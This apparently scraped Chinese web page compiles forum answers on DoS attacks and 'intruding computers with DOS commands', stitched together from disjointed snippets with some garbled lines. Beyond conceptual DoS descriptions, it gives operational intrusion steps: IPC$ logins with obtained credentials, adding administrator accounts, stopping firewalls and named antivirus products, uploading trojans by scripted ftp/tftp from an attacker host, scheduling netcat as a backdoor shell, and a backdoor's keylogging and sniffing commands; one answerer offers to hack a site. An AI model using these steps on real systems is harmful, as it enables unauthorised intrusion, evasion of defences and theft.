怎么用DOS命令攻击
DoS具有代表性的攻击手段包括PingofDeathdos攻击快闪族、TearDrop、UDPflood、SYNflood、LandAttack、IPSpoofingDoS等。
具体DoS攻击方法很多,但大多都可以分为以下几类:
利用软件实现的缺陷
OOB攻击(常用工具winnuke),teardrop攻击(常用工具teardrop.cboink.cbonk.c),lan
软件主流程图
d攻击,IGMP碎片包攻击,jolt攻击,Cisco2600路由器IOSversion12.0(10)远程拒绝服务攻击等等,这些攻击都是利用了被攻击软件的实现上的缺陷完成DoS攻击的。通常这些攻击工具向被攻击系统发送特定类型的一个或多个报文,这些攻击通常都是致命的,一般都是一击致死,而且很多攻击是可以伪造源地址的,所以即使通过IDS或者别的sniffer软件记录到攻击报文也不能找到谁发动的攻击,而且此类型的攻击多是特定类型的几个报文,非常短暂的少量的报文,如果伪造源IP地址的话,使追查工作几乎是不可能。
那么如何造成这些攻击的?通常是软件开发过程中对某种特定类型的报文、或请求没有处理,导致软件遇到这种类型的报文运行出现异常,导致软件崩溃甚至系统崩溃。下面结合几个具体实例解释一下这种攻击的成因。
1997年5月7号有人发布了一个winnuke.c。首先建立一条到Win95/NT主机的TCP连接,然后发送TCP紧急数据,导致对端系统崩溃。139/TCP是Win95/NT系统最常见的侦听端口,所以winnuke.c使用了该端口。之所以称呼这种攻击为OOB攻击,因为MSG_OOB标志,实际应该是TCP紧急数据攻击。
原始teardrop.c只构造了两种碎片包,每次同时发送这两种UDP碎片包。如果指定发送次数,将完全重复先前所发送出去的两种碎片包。它可以伪造源ip并跨越路由器进行远程攻击,影响的系统包括Linux/WinNT/Win95。使用的方法是:
teardrop源ip目的ip[-s源端口][-d目的端口][-n次数]
比较新的一个DoS攻击是Windows的SMB实现中的DoS攻击,2002年8月发布,只要允许匿名连接的windows系统就可以进行远程攻击,强烈建议Windows用户打相应的补丁。它的方法就是先和目标系统建立一个连接,然后发送一个特定的请求,目标系统就会兰屏。发布的测试工具SMBdie.exe是图形界面工具,输入目标地址NETBIOS名称即可。
从上面的讨论可以看出,这种攻击行为威力很大,而且难于侦察。但真实情况下它的危害仅现于漏洞发布后的不长的时间段内,相关厂商会很快发布补丁修补这种漏洞。所以上面提到的几种较老的攻击在现实的环境中,通常是无效的。不过最新的攻击方法还是让我们不寒而栗,我们可以做的就是关注安全漏洞的发布,及时打上新的补丁。如果你想偷懒的话,购买专业安全服务公司的相关服务应该是个更好的选择。
利用协议的漏洞
如果说上面那种漏洞危害的时间不是很长,那么这种攻击的生存能力却非常强。为了能够在网络上进行互通、互联,所有的软件实现都必须遵循既有的协议,而如果这种协议存在漏洞的话,所有遵循此协议的软件都会受到影响。
最经典的攻击是synflood攻击,它利用TCP/IP协议的漏洞完成攻击。通常一次TCP连接的建立包括3个步骤,客户端发送SYN包给服务器端,服务器分配一定的资源给这里连接并返回SYN/ACK包,并等待连接建立的最后的ACK包,最后客户端发送ACK报文,这样两者之间的连接建立起来,并可以通过连接传送数据了。而攻击的过程就是疯狂发送SYN报文,而不返回ACK报文,服务器占用过多资源,而导致系统资源占用过多,没有能力响应别的操作,或者不能响应正常的网络请求。
这个攻击是经典的以小搏大的攻击,自己使用少量资源占用对方大量资源。一台P4的Linux系统大约能发到30-40M的64字节的synflood报文,而一台普通的服务器20M的流量就基本没有任何响应了(包括鼠标、键盘)。而且synflood不仅可以远程进行,而且可以伪造源IP地址,给追查造成很大困难,要查找必须所有骨干网络运营商,一级一级路由器的向上查找。
对于伪造源IP的synflood攻击,除非攻击者和被攻击的系统之间所有的路由器的管理者都配合查找,否则很难追查。当前一些防火墙产品声称有抗DoS的能力,但通常他们能力有限,包括国外的硬件防火墙大多100M防火墙的抗synflood的能力只有20-30Mbps(64字节syn包),这里涉及到它们对小报文的转发能力,再大的流量甚至能把防火墙打死机。有些安全厂商认识到DoS攻击的危害,开始研发专用的抗拒绝服务产品。
由于TCP/IP协议相信报文的源地址,另一种攻击方式是反射拒绝服务攻击,另外可以利用还有广播地址,和组播协议辅助反射拒绝服务攻击效果更好。不过大多数路由器都禁止广播地址和组播协议的地址。
另一类攻击方式是使用大量符合协议的正常服务请求,由于每个请求耗费很大系统资源,导致正常服务请求不能成功。如HTTP协议是无状态协议,攻击者构造大量搜索请求,这些请求耗费大量服务器资源,导致DoS。这种方式攻击比较好处理,由于是正常请求,暴露了正常的源IP地址,禁止这些IP就可以了。
进行资源比拼
这种攻击方式属于无赖打法,我凭借着手中的资源丰富,发送大量的垃圾数据侵占完你的资源,导致DoS。比如,ICMPflood,mstreamflood,Connectionflood。为了获得比目标系统更多资源,通常攻击者会发动DDoS(DistributedDos分布式拒绝服务)攻击者控制多个攻击傀儡发动攻击,这样才能产生预期的效果。前两类攻击是可以伪造IP地址的,追查也是非常困难,第3种攻击由于需要建立连接,可能会暴露攻击傀儡的IP地址,通过防火墙禁止这些IP就可以了。对于难于追查,禁止的攻击行为,我们只能期望专用的抗拒绝服务产品了。
攻击程序
smurf、trinoo、tfn、tfn2k以及stacheldraht是比较常见的DoS攻击程序,本文将对它们的原理以及抵御措施进行论述,以帮助管理员有效地抵御DoS风暴攻击,维护站点安全。
如何用DOS命令攻击一台电脑在网上?
可以利用NC.EXE这个程序 是DOS命令的 DOS命令不能攻击网站 DOS命令能入侵网站服务器 但是现在一般服务器都比较安全的 如果楼主说的是DDOS 而不是DOS的 DDOS叫做拒绝服务器攻击 你需要大量的肉鸡才能实现 希望能给个最佳答案 也可以尝试帮你入侵下 你说的那个网站
用什么dos命令在有IP,用户名,和密码的攻击对方
DOS命令下的入侵命令大全
DOS
切换到MS-DOS提示符
DIR/LS/LIST
目录/文件列表
CD
进入目录
MD/MKDIR
创建目录
PWD
查看当前目录
COPY/CP
复制目录/文件
DEL/RM
删除目录/文件
REN
重命名文件
MOVE/MV
移动目录/文件
TYPE/CAT
查看文本内容
POPMSG
弹出系统对话框
SYSINFO
查看系统基本信息
WHO/W
查看当前所有链接者IP
SHELL
通过系统SHELL执行CMD命令
EXEC/RUN
通过WINDOWS
API
运行程序
WS
查看窗口列表
PS
查看进程列表
KILL
强行关闭进程
GET/GETFILE
通过WOLLF直接下载文件
PUT/PUTFILE
通过WOLLF直接上传文件
WGET
从HTTP服务器下载文件
FGET
从FTP服务器下载文件
FPUT
向FTP服务器上传文件
TELNET
连接到其它安装本服务的机器
FTPD
启动FTP服务
TELNETD/TELD/EXPOPT
在新端口上输入SHELL
REDIR
绑定TCP端口,并转发接收到的所有数据
REDIR_STOP
停止端口转发
SNIFF
鉴听局域网内FTP/SMTP/POP3/HTTP
密码《该功能只对XP和2000有限》
SNIFF_STOP
停止鉴听密码
KEYLOG
启动键盘记录
KEYLOG_STOP
停止键盘记录
REBOOT
重启系统
SHUTDOWN
关闭系统
EXIT
断开当前链接
QUIT
断开所有链接并停止服务
REMOVE
卸载服务
VERVERSION
版本信息
HELP/H/?
帮助信息
建立IPC$共享的命令
net
use
\目标IPipc$
"账号密码"
/user:账号
添加管理员账号命令
net
user
用户名
密码
/add
添加到管理员组
再次运行命令
net
localgroup
administrators
用户名
/add
返回远程主机当前时间
net
time
\远程主机IP
在远程主机1:00启动muma.exe这个服务
at
\远程主机IP
1:00
muma.exe
远程拷贝命令:1.把本地C盘下的muma.exe复制到目标IP的C盘下命令格式为:copy
muma.exe
\目标IPc$muma.exe
2.把本地C盘下的muma.exe复制到目标IP的WINNT目录里面命令为:copy
muma.exe
\目标IPadmin$muma.exe
启动TELNET服务命令为:net
start
telnet
关闭TELNET服务命令为:net
stop
telnet
查看计算机上账号列表:net
user
把GUEST用户激活:net
user
guest
/active:yse
把GUEST的密码改为123:
net
userguest
123
关闭对方的NT服务器命令:
shutdown
\目标IP
time
注:time是重启时间
查看对方机器系统类型:type
c:oot.ini
查看对方机器IP:ipconfig
/all
与对方建立共享并映射驱动驱到本地Z盘:net
use
z:
\192.168.0.1c$
"7788"
/user:"administrator"
如何用DOS命令入侵别人电脑?(正当研究)
DOS下不用别的工具,外网……不知道纯DOS下怎么办到。。。
局域网常用命令:
1 ping
ping 主机ip或名字:向目标主机发送4个icmp数据包,测试对方主机是否收
到并响应,一般常用于做普通网络是否通畅的测试。但是ping不同不代表网
络不通,有可能是目标主机装有防火墙并且阻止了icmp响应。
ping -t :不停的发送数据包。当然都很小,不能称作攻击。有些人自己写
了一些类似于ping命令的程序,不停的发送很大的数据包,以阻塞目标主机
的网络连接。
2 net
建议是用net /?获取具体帮助信息。实在是有很多参数,参数下面还有参
数。常用:net view \\主机 来看共享,net start/stop 服务 来启动和停
止服务,信使服务个人不太喜欢。
3 netstat
netstat 主机:查看主机当前的tcp/ip连接状态,如端口的状态。
4 nbtstat
nbtstat 主机:查看主机使用的NetBIOS name。
5 tracert
tracert 主机:查看从你自己到目标逐机到底经过了那些路径。如:
tracert www.ncie.gov.cn 然后等待。。。就会看到你经过的一个个路由节
点,一般大一点的路由器,如电信的主干路由,除了ip以外,都有英文标示
的。
6 pathping
pathping 主机:类似tracert,但可以显示一些tracert不能显示出来的信
息。可以自己试试。
7 ftp
字符方式的ftp,我喜欢用;)不用装cuteftp了。
8 telnet
字符方式的远程登录程序,是网络人员极其爱用的远程登录程序。我最近常
用来调试邮件服务器。
9 ipconfig 非常有用的网络配置、排错。。。命令。
不加参数显示当前机器的网络接口状态。
/all 先是详细的信息。
/release 释放当前ip。
/renew 重新申请ip。
/flushdns 刷新dns缓存。
/registerdns 重新栽dns服务器上注册自己。
。。。。。。
10 arp 操作当前的arp缓存。
-a 显示arp缓存。
-d 删除一条缓存纪录。
-s 田家一条缓存纪录。
11 nslookup 排除dns错误的利器。是一个交互的工具。使用之前请先努力弄清楚dns的作用以及dns的工作原理。
怎样用纯DOS命令入侵局域网啊~
一,ping 二,nbtstat 三,netstat
四,tracert
五,net
六,at
七,ftp
八,telnet
把这些命令学下就行了,主要多尝试不怕失败才能提高,不过要以学习研究为目的。
求入侵用DOS命令大全
一.对用户操作net user --------查看有哪些用户net user guest /active:yes ------ 激活guest用户 net user 用户名 密码 /add ------建立用户 net localgroup administrators 用户名 /add ------- 把“用户”添加到管理员中使其具有管理员权限二.必备命令net start -----查看开启了哪些服务net start 服务名-----开启服务net stop 服务名------停止某服务netstat -an :查看端口的网络连接情况ipconfig :查看本地ip地址三.关防火墙,杀毒软件命令net stop sharedaccess ----关系统自带防火墙pskill.exe ravmon -----杀掉瑞星软件pskill.exe pfw ----关天网防火墙net stop "Symantec AntiVirus"----关于诺顿企业版net stop KAVStart------关闭金山杀毒四.向肉鸡上传文件命令:第一种方法:tftp命令格式:tftp -i 你的公网IP get xx.exe第二种方法:ftp命令格式:echo open xxx.xxx.xxx.xxxc:\ylonline..txt FTP的IPecho userc:\ylonline..txt FTP的用户名 echo passc:\ylonline..txt FTP的密码 echo get hack.exec:\ylonline..txt 木马echo byec:\ylonline..txtftp -s:c:\ylonline..txtdel c:\ylonline..txt 第三种方法:start http://```(改成你的网页木马地址) 1.:net
只要你拥有某ip的用户名和密码,那就用ipc$做连接吧!
这里我们假如你得到的用户是hbx,密码是123456。假设对方ip为127.0.0.1
net use \\127.0.0.1\ipc$ 123456 /user:hbx
退出的命令是
net use \\127.0.0.1\ipc$ /delte
下面的操作你必须登陆后才可以用.登陆的方法就在上面.
2.下面我们讲怎么创建一个用户,由于sa的权限相当于系统的超级用户.
我们加一个heibai的用户密码为lovechina
net user heibai lovechina /add
只要显示命令成功,那么我们可以把他加入administrator组了.
net localgroup administrators heibai /add
3.这里是讲映射对方的c盘,当然其他盘也可以,只要存在就行了.我们这里把对方的c盘映射到本地的z盘.
net use z:\\127.0.0.1\c$
net start telnet
这样可以打开对方的telnet服务.
----------------------
这里是将guest用户激活,guest是nt的默认用户,而且无法删除呢?不知道是否这样,我的2000就是删除不了它。
net user guest /active:yes
4.这里是把一个用户的密码改掉,我们把guest的密码改为lovechina,其他用户也可以的。只要有权限就行了呀!
net user guest lovechina
net命令果然强大啊!
2:at
一般一个入侵者入侵后都会留下后门,也就是种木马了,你把木马传了上去,怎么启动他呢?
那么需要用at命令,这里假设你已经登陆了那个服务器。
你首先要得到对方的时间,
net time \\127.0.0.1
将会返回一个时间,这里假设时间为12:1,现在需要新建一个作业,其id=1
at \\127.0.0.1 12:3 nc.exe
这里假设了一个木马,名为nc.exe,这个东西要在对方服务器上.
这里介绍一下nc,nc是netcat的简称,为了方便输入,一般会被改名.它是一个telnet服务,端口为99.
等到了12:3就可以连接到对方的99端口.这样就给对方种下了木马.
3:telnet
这个命令非常实用,它可以与远方做连接,不过正常下需要密码、用户,不过你给对方种了木马,直接连到这个木马打开的端口.
telnet 127.0.0.1 99
这样就可以连到对方的99端口.那你就可以在对方运行命令了,这个也就是肉鸡.
4:ftp
它可以将你的东西传到对方机子上,你可以去申请个支持ftp上传的空间,国内多的是,如果真的找不到,我 http://www.51.net/,不错的.当我们申请完后,它会给用户名,密码,以及ftp服务器.
在上传前需要登陆先,这里我们假设ftp服务 http://www.51.net/,用户名是hucjs,密码是654321
ftp http://www.51.net/
他会要求输入用户,成功后会要求输入密码.
----------------------
下面先说上传,假设你需上传的文件是index.htm,它位于c:\下,传到对方d:\
get c:\index.htm d:\
假设你要把对方c盘下的index.htm,下到你的机子的d盘下
put c:\index.htm d:\
5:copy
下面我说说怎样把本地的文件复制到对方硬盘上去,需要建立好ipc$连接才有效。
这里我们把本地c盘下的index.htm复制到127.0.0.1的c盘下
copy index.htm \\127.0.0.1\c$\index.htm
----------------------
如果你要复制到d盘下把c改为d,就行了!
copy index.htm \\127.0.0.1\d$\index.htm
什么是DOS攻击,DOS攻击的命令有哪些,攻击的方式有哪些?
DOS,是Denial of Service的简称,即拒绝服务,不是DOS操作系统,造成DOS的攻击行为被称为DOS攻击,其目的是使计算机或网络无法提供正常的服务。最常见的DOS攻击有计算机网络带宽攻击和连通性攻击。
DOS攻击类型有哪些?常见方式如下:
SYN FLOOD
利用服务器的连接缓冲区,利用特殊的程序,设置TCP的header,向服务器端不断地成倍发送只有SYN标志的TCP连接请求。当服务器接收的时候,都认为是没有建立起来的连接请求,于是为这些请求建立会话,排到缓冲区队列中。
如果SYN请求超过了服务器能容纳的限度,缓冲区队列满,那么服务器就不再接收新的请求;其他合法用户的连接都被拒绝,可以持续SYN请求发送,直到缓冲区中都是自己的只有SYN标志的请求。
IP欺骗
DOS攻击这种攻击利用RST位来实现的,比如现在有一个合法用户已经同服务器建立正常连接,攻击者构造攻击的TCP数据,伪装自己的IP为正常ip,向服务器发送一个带有RST位的TCP数据段。服务器接收到这样的数据后,认为从合法用户发送的连接有错误,就会清空缓冲区中建立好的连接。这时,如果合法用户再发送合法数据,服务器就已经没有这样的连接了,该用户必须重新开始建立连接。
带宽DOS攻击
如果连接带宽足够大而服务器又不是很大,可以发送请求,来消耗服务器的缓冲区消耗服务器的带宽。这种攻击就是人多力量大,配合上SYN一起实施DOS,威力巨大。
自身消耗的DOS攻击
这种是老式的攻击手法。说老式,是因为老式的系统有这样的自身BUG,比如win 95这样的系统。这种DOS攻击就是把请求客户端IP和端口弄成主机的IP端口相同,发送给主机。使得主机给自己发送TCP请求和连接。这种主机的漏洞会很快地把资源消耗光,直接导致宕机。这种伪装对一些身份认证系统威胁还是很大的。
塞满服务器的硬盘
如果服务器可以没有限制地执行写操作,那么都能成为塞满硬盘造成DOS攻击的途径:
1、发送垃圾邮件:一般公司的服务器可能把邮件服务器和Web服务器都放在一起,破坏者可以发送大量的垃圾邮件,这些邮件可能都塞在一个邮件队列中或者就是坏邮件队列中,直到邮箱被撑破或者把硬盘塞满。
2、让日志记录满:入侵者可以构造大量的错误信息发送出来,服务器记录这些错误,可能就造成日志文件非常庞大,甚至会塞满硬盘。同时会让管理员痛苦地面对大量的日志,甚至就不能发现入侵者真正的入侵途径。
3、向匿名FTP塞垃圾文件,这样也会塞满硬盘空间。